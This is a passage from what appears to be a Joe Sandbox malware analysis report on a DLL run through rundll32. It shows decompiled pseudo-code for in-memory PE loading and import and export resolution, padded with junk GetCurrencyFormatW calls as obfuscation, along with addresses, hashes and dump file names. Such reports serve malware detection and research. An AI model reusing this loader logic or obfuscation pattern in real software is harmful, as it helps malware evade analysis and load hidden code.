					if(GetCurrencyFormatW() *  *0x100440d4 + (0 |  *(_v24 + 0x18) == 0x00000000) != 0) {
						goto L16;
					}
					_t129 = 0;
					if( *(_a4 + 0x30) != 0) {
						L12:
						_t130 = GetCurrencyFormatW(_t129, 0x11d4, _t198, _t129, L"xadqsavcbdfewescGADW", 0x22b9);
						_t133 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_t140 = bsearch(_t238 + 0x40 + GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 * 4,  *(_a4 + 0x30), _t133 *  *0x100440d4 +  *(_v24 + 0x18), _t130 *  *0x100440d4 + 8, E1000310E);
						if(_t140 == 0) {
							goto L16;
						}
						_t141 =  *(_t140 + 4) & 0x0000ffff;
						L14:
						_a4 = _t141;
						if(_a4 > GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 +  *((intOrPtr*)(_v24 + 0x14))) {
							goto L16;
						}
						return  *((intOrPtr*)(GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc +  *((intOrPtr*)(_v24 + 0x1c)) + _v20 + _a4 * 4)) + _v20;
					}
					_v4 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 << 2;
					_v16 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 +  *((intOrPtr*)(_v24 + 0x20)) + _v4 + _v20;
					_v4 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8 + GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8;
					_v12 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 +  *((intOrPtr*)(_v24 + 0x24)) + _v4 + _v20;
					_v4 = malloc(GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 +  *(_v24 + 0x18) * 8);
					_t173 = _v4 + GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc * 8;
					_v8 = _t173;
					 *(_a4 + 0x30) = _t173;
					if(_t173 == 0) {
						goto L16;
					}
					_v4 = _v4 & 0x00000000;
					if(GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 +  *(_v24 + 0x18) == 0) {
						L11:
						_t177 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						qsort( *(_a4 + 0x30), GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440cc +  *(_v24 + 0x18), _t177 *  *0x100440d8 + 8, E100030AA);
						_t238 = _t238 + 0x10;
						_t129 = 0;
						goto L12;
					} else {
						goto L10;
					}
					do {
						L10:
						_t184 = GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_t186 = _v8;
						 *_t186 = _t184 *  *0x100440dc + _v20 +  *_v16;
						 *((short*)(_t186 + 4)) =  *_v12;
						GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_v4 = _v4 + 1;
						GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_v16 = _v16 + 4;
						GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_v12 = _v12 + 2;
						GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_v8 = _v8 + 8;
					} while (_v4 < GetCurrencyFormatW(0, 0x11d4, _t198, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 +  *(_v24 + 0x18));
					goto L11;
				}
				_a4 =  *((intOrPtr*)(_t125 + 0x10));
				_v4 = _a8 & 0x0000ffff;
				_t196 = GetCurrencyFormatW(??, ??, ??, ??, ??, ??);
				_t197 = _v4;
				if(_t197 < _t196 *  *0x100440d0 + _a4) {
					goto L16;
				}
				_t141 = _t197 - _a4;
				goto L14;
			}

























                                                                                                            0x10003122
                                                                                                            0x10003143
                                                                                                            0x10003151
                                                                                                            0x1000316a
                                                                                                            0x10003187
                                                                                                            0x1000319e
                                                                                                            0x100031a7
                                                                                                            0x100031ab
                                                                                                            0x1000355d
                                                                                                            0x00000000
                                                                                                            0x1000355d
                                                                                                            0x100031cc
                                                                                                            0x100031f3
                                                                                                            0x10003207
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10003219
                                                                                                            0x10003224
                                                                                                            0x1000322b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10003235
                                                                                                            0x10003236
                                                                                                            0x1000323b
                                                                                                            0x1000323d
                                                                                                            0x10003244
                                                                                                            0x10003245
                                                                                                            0x10003247
                                                                                                            0x10003294
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000329e
                                                                                                            0x100032a3
                                                                                                            0x1000349f
                                                                                                            0x100034ae
                                                                                                            0x100034c7
                                                                                                            0x100034f9
                                                                                                            0x10003504
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10003506
                                                                                                            0x1000350a
                                                                                                            0x10003516
                                                                                                            0x1000352e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10003557
                                                                                                            0x100032cb
                                                                                                            0x100032f3
                                                                                                            0x1000330e
                                                                                                            0x10003336
                                                                                                            0x10003361
                                                                                                            0x10003372
                                                                                                            0x1000337b
                                                                                                            0x1000337f
                                                                                                            0x10003382
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10003388
                                                                                                            0x100033a9
                                                                                                            0x10003452
                                                                                                            0x10003463
                                                                                                            0x10003494
                                                                                                            0x1000349a
                                                                                                            0x1000349d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100033af
                                                                                                            0x100033af
                                                                                                            0x100033bb
                                                                                                            0x100033d0
                                                                                                            0x100033dc
                                                                                                            0x100033e9
                                                                                                            0x100033ed
                                                                                                            0x100033ef
                                                                                                            0x100033ff
                                                                                                            0x10003401
                                                                                                            0x10003412
                                                                                                            0x10003414
                                                                                                            0x10003425
                                                                                                            0x10003427
                                                                                                            0x10003448
                                                                                                            0x00000000
                                                                                                            0x100033af
                                                                                                            0x1000324c
                                                                                                            0x10003255
                                                                                                            0x10003259
                                                                                                            0x10003268
                                                                                                            0x1000326e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10003274
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10003155
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000316E
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000318B
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100031BB
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100031D0
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100031F7
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10003219
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10003259
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000327D
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100032B3
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100032CF
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100032F7
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10003312
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000333A
                                                                                                            • malloc.MSVCRT ref: 1000334E
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10003365
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10003399
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000351A
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 1000353C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat$malloc
                                                                                                            • String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 3897936752-3161301136
                                                                                                            • Opcode ID: ad4306dd0e1101c6acc404a6b929437f6ac9df0eb58d4d58c0bece070a968090
                                                                                                            • Instruction ID: 34db2b080b93b1a5fa06b343cb693385c3cc97db3aa9a73273c3b7a7a01e4154
                                                                                                            • Opcode Fuzzy Hash: ad4306dd0e1101c6acc404a6b929437f6ac9df0eb58d4d58c0bece070a968090
                                                                                                            • Instruction Fuzzy Hash: 95C14670604214BFE208DB51CD96F5BBBECEB8A789F01480EF7459B2A2C731E9148F65
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10002BDE Relevance: 52.9, APIs: 28, Strings: 2, Instructions: 381COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 81%
                                                                                                            			E10002BDE(intOrPtr* _a4) {
				int _v4;
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int* _v20;
				void* _v24;
				signed int _t121;
				signed int _t144;
				void* _t156;
				intOrPtr _t157;
				void* _t178;
				signed int _t184;
				intOrPtr _t189;
				intOrPtr _t192;
				short* _t218;
				intOrPtr _t246;
				intOrPtr* _t247;
				int _t256;
				void** _t257;

				_t257 =  &_v24;
				_t256 = 0x22b9;
				_t218 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v16 =  *((intOrPtr*)(_a4 + 4));
				_v4 = 1;
				_v8 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8;
				_v8 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + _v8;
				_t121 =  *_a4 + 0x80 + (GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc + _v8) * 8;
				_v8 = _t121;
				if( *((intOrPtr*)(_t121 + 4)) != 0) {
					_v12 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 * 0x14;
					_v24 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d8 +  *_v8 + _v12 + _v16;
					L20:
					while(IsBadHugeReadPtr(_v24, GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440dc + 0x14) == 0) {
						if(GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440d4 +  *((intOrPtr*)(_v24 + 0xc)) == 0) {
							L26:
							return _v4;
						}
						_t144 =  *((intOrPtr*)(_a4 + 0x24))(GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440dc +  *((intOrPtr*)(_v24 + 0xc)) + _v16,  *((intOrPtr*)(_a4 + 0x34)));
						_v8 = _t144;
						if(_t144 == 0) {
							_v4 = 0;
							goto L26;
						}
						_v12 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440cc +  *((intOrPtr*)(_a4 + 0xc)) + 1;
						_v12 = realloc( *(_a4 + 8), (GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440d0 + 4) * _v12);
						_t156 = _v12 + GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440e0 * 4;
						if(_t156 == 0) {
							_t157 = _a4;
							 *((intOrPtr*)(_t157 + 0x2c))(_v8,  *((intOrPtr*)(_t157 + 0x34)));
							_v4 = _v4 & 0x00000000;
							L25:
							goto L26;
						}
						_t256 = 0x22b9;
						 *(_a4 + 8) = _t156;
						 *((intOrPtr*)( *(_a4 + 8) + (GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc +  *((intOrPtr*)(_a4 + 0xc))) * 4)) = _v8;
						 *((intOrPtr*)(_a4 + 0xc)) =  *((intOrPtr*)(_a4 + 0xc)) + 1;
						_push(0x22b9);
						_push(L"xadqsavcbdfewescGADW");
						_push(0);
						_push(_t218);
						_push(0x11d4);
						_push(0);
						if( *_v24 == 0) {
							_v12 = GetCurrencyFormatW() *  *0x100440e0 << 2;
							_v20 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc +  *((intOrPtr*)(_v24 + 0x10)) + _v12 + _v16;
							_v12 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440cc << 2;
							_t178 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 +  *((intOrPtr*)(_v24 + 0x10)) + _v12;
						} else {
							_v12 = GetCurrencyFormatW() *  *0x100440d0 << 2;
							_v20 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440dc +  *_v24 + _v12 + _v16;
							_v12 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d4 << 2;
							_t178 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 +  *((intOrPtr*)(_v24 + 0x10)) + _v12;
						}
						_v12 = _t178 + _v16;
						while( *_v20 != 0) {
							if(GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440e0 + ( *_v20 >> 0x1f) == 0) {
								_t184 = GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256);
								_t246 = _a4;
								_t189 =  *((intOrPtr*)(_t246 + 0x28))(_v8, _t184 *  *0x100440e0 + _v16 +  *_v20 + 2,  *((intOrPtr*)(_t246 + 0x34)));
							} else {
								_t189 =  *((intOrPtr*)(_a4 + 0x28))(_v8, GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256) *  *0x100440d0 + ( *_v20 & 0x0000ffff),  *((intOrPtr*)(_a4 + 0x34)));
							}
							_t247 = _v12;
							 *_t247 = _t189;
							_t257 =  &(_t257[3]);
							if( *_t247 == 0) {
								_v4 = 0;
								L18:
								if(_v4 == 0) {
									_t192 = _a4;
									 *((intOrPtr*)(_t192 + 0x2c))(_v8,  *((intOrPtr*)(_t192 + 0x34)));
									goto L25;
								}
								GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256);
								_v24 = _v24 + 0x14;
								goto L20;
							} else {
								GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256);
								_v20 =  &(_v20[1]);
								GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256);
								_v12 = _v12 + 4;
								continue;
							}
						}
						goto L18;
					}
					goto L26;
				}
				return 1;
			}






















                                                                                                            0x10002bde
                                                                                                            0x10002bf2
                                                                                                            0x10002bff
                                                                                                            0x10002c0d
                                                                                                            0x10002c11
                                                                                                            0x10002c2e
                                                                                                            0x10002c4b
                                                                                                            0x10002c62
                                                                                                            0x10002c6e
                                                                                                            0x10002c72
                                                                                                            0x10002c9e
                                                                                                            0x10002cb9
                                                                                                            0x00000000
                                                                                                            0x10002fc9
                                                                                                            0x10002cde
                                                                                                            0x10003021
                                                                                                            0x00000000
                                                                                                            0x10003021
                                                                                                            0x10002d10
                                                                                                            0x10002d19
                                                                                                            0x10002d1d
                                                                                                            0x10002ff6
                                                                                                            0x00000000
                                                                                                            0x10002ff6
                                                                                                            0x10002d4d
                                                                                                            0x10002d7e
                                                                                                            0x10002d8f
                                                                                                            0x10002d94
                                                                                                            0x10002ffc
                                                                                                            0x10003007
                                                                                                            0x1000300a
                                                                                                            0x1000301f
                                                                                                            0x00000000
                                                                                                            0x10003020
                                                                                                            0x10002d9e
                                                                                                            0x10002daf
                                                                                                            0x10002dcb
                                                                                                            0x10002dd2
                                                                                                            0x10002dd9
                                                                                                            0x10002dda
                                                                                                            0x10002de3
                                                                                                            0x10002de4
                                                                                                            0x10002de5
                                                                                                            0x10002de6
                                                                                                            0x10002de7
                                                                                                            0x10002e76
                                                                                                            0x10002e9e
                                                                                                            0x10002eba
                                                                                                            0x10002ece
                                                                                                            0x10002de9
                                                                                                            0x10002e01
                                                                                                            0x10002e28
                                                                                                            0x10002e44
                                                                                                            0x10002e58
                                                                                                            0x10002e58
                                                                                                            0x10002ed6
                                                                                                            0x10002f9d
                                                                                                            0x10002eff
                                                                                                            0x10002f45
                                                                                                            0x10002f58
                                                                                                            0x10002f67
                                                                                                            0x10002f01
                                                                                                            0x10002f34
                                                                                                            0x10002f34
                                                                                                            0x10002f6a
                                                                                                            0x10002f6e
                                                                                                            0x10002f72
                                                                                                            0x10002f77
                                                                                                            0x10002fac
                                                                                                            0x10002fb0
                                                                                                            0x10002fb6
                                                                                                            0x10003011
                                                                                                            0x1000301c
                                                                                                            0x00000000
                                                                                                            0x1000301c
                                                                                                            0x10002fc2
                                                                                                            0x10002fc4
                                                                                                            0x00000000
                                                                                                            0x10002f79
                                                                                                            0x10002f83
                                                                                                            0x10002f85
                                                                                                            0x10002f96
                                                                                                            0x10002f98
                                                                                                            0x00000000
                                                                                                            0x10002f98
                                                                                                            0x10002f77
                                                                                                            0x00000000
                                                                                                            0x10002faa
                                                                                                            0x00000000
                                                                                                            0x10002ff4
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002C19
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002C32
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002C4F
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002C86
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002CA2
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002FD5
                                                                                                            • IsBadHugeReadPtr.KERNEL32(000022B9,-00000014), ref: 10002FE6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat$HugeRead
                                                                                                            • String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 393575760-3161301136
                                                                                                            • Opcode ID: d104fe54fbad355bcebe88f005ab9aa9ac17f58dad5190f15827009be6e713bf
                                                                                                            • Instruction ID: ead797fee4320dd8a6b32923dbdec08024b9b474de8a2ec407594d38246e10a8
                                                                                                            • Opcode Fuzzy Hash: d104fe54fbad355bcebe88f005ab9aa9ac17f58dad5190f15827009be6e713bf
                                                                                                            • Instruction Fuzzy Hash: 15D15971508205AFE304DF60CD96F6BBBE8EB8A788F11581DF6459B292C732E914CF25
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10001E51 Relevance: 45.8, APIs: 23, Strings: 3, Instructions: 314COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10001E51(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				signed int _v4;
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr* _v20;
				int _t93;
				signed int _t94;
				signed int _t108;
				intOrPtr* _t109;
				void* _t113;
				void* _t147;
				short* _t160;
				signed int _t187;
				short* _t194;
				void* _t195;
				void* _t196;
				void* _t197;

				_t195 =  &_v20;
				_t194 = L"xadqsavcbdfewescGADW";
				_t160 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v12 =  *((intOrPtr*)(_a16 + 4));
				_v4 =  *(GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440e0 * 0xf8 +  *_a16 + 0x14) & 0x0000ffff;
				_v4 = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440cc * 0x28 + _v4;
				_v4 = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440e0 + _v4 +  *_a16 + 0x18;
				_v8 = 0;
				if(GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d0 + ( *( *_a16 + 6) & 0x0000ffff) <= 0) {
					L11:
					return 1;
				}
				_v20 = _v4 + 0x10;
				do {
					_t93 = 0;
					if( *_v20 != 0) {
						_t94 = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9);
						if(E10001E20(GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d0 + _a8, _t94 *  *0x100440d0 +  *_v20 +  *((intOrPtr*)(_v20 + 4))) == 0) {
							L13:
							return 0;
						}
						_t108 = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9);
						_t109 = _v20;
						_t113 =  *((intOrPtr*)(_a16 + 0x1c))( *((intOrPtr*)(_t109 - 4)) + _v12, _t108 *  *0x100440d8 +  *_t109, GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440cc + 0x1000, GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d0 + 4,  *((intOrPtr*)(_a16 + 0x34)));
						_t196 = _t195 + 0x14;
						if(_t113 == 0) {
							goto L13;
						}
						_v16 = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d8 +  *((intOrPtr*)(_v20 - 4)) + _v12;
						memcpy(_v16,  *((intOrPtr*)(_v20 + 4)) + _a4, GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440cc +  *_v20);
						_t195 = _t196 + 0xc;
						_v4 = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d8 - 0x00000001 & _v16;
						 *(_v20 - 8) = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d4 + _v4;
						L9:
						_t93 = 0;
						goto L10;
					}
					_t187 =  *((intOrPtr*)(_a12 + 0x38));
					_v4 = _t187;
					if(_t187 <= 0) {
						goto L10;
					}
					_t147 =  *((intOrPtr*)(_a16 + 0x1c))(GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440e0 +  *((intOrPtr*)(_v20 - 4)) + _v12, GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d0 + _v4, GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d0 + 0x1000, GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440dc + 4,  *((intOrPtr*)(_a16 + 0x34)));
					_t197 = _t195 + 0x14;
					if(_t147 == 0) {
						goto L13;
					}
					_v16 = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d0 +  *((intOrPtr*)(_v20 - 4)) + _v12;
					 *(_v20 - 8) = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d0 - 0x00000001 & _v16;
					memset(_v16, 0, GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d4 + _v4);
					_t195 = _t197 + 0xc;
					goto L9;
					L10:
					_v8 = _v8 + 1;
					_v20 = _v20 + 0x28;
				} while (_v8 < GetCurrencyFormatW(_t93, 0x11d4, _t160, _t93, _t194, 0x22b9) *  *0x100440d0 + ( *( *_a16 + 6) & 0x0000ffff));
				goto L11;
			}




















                                                                                                            0x10001e51
                                                                                                            0x10001e6a
                                                                                                            0x10001e72
                                                                                                            0x10001e80
                                                                                                            0x10001eaa
                                                                                                            0x10001eca
                                                                                                            0x10001eeb
                                                                                                            0x10001ef5
                                                                                                            0x10001f10
                                                                                                            0x100021bf
                                                                                                            0x00000000
                                                                                                            0x100021c1
                                                                                                            0x10001f1d
                                                                                                            0x10001f21
                                                                                                            0x10001f25
                                                                                                            0x10001f29
                                                                                                            0x10002045
                                                                                                            0x1000207d
                                                                                                            0x100021ca
                                                                                                            0x00000000
                                                                                                            0x100021ca
                                                                                                            0x100020ca
                                                                                                            0x100020d5
                                                                                                            0x100020e8
                                                                                                            0x100020eb
                                                                                                            0x100020f0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10002122
                                                                                                            0x10002144
                                                                                                            0x1000214a
                                                                                                            0x10002173
                                                                                                            0x10002188
                                                                                                            0x1000218b
                                                                                                            0x1000218b
                                                                                                            0x00000000
                                                                                                            0x1000218b
                                                                                                            0x10001f33
                                                                                                            0x10001f38
                                                                                                            0x10001f3c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10001fba
                                                                                                            0x10001fbd
                                                                                                            0x10001fc2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10001ff4
                                                                                                            0x10002016
                                                                                                            0x1000202d
                                                                                                            0x10002033
                                                                                                            0x00000000
                                                                                                            0x1000218d
                                                                                                            0x1000218d
                                                                                                            0x10002191
                                                                                                            0x100021b5
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
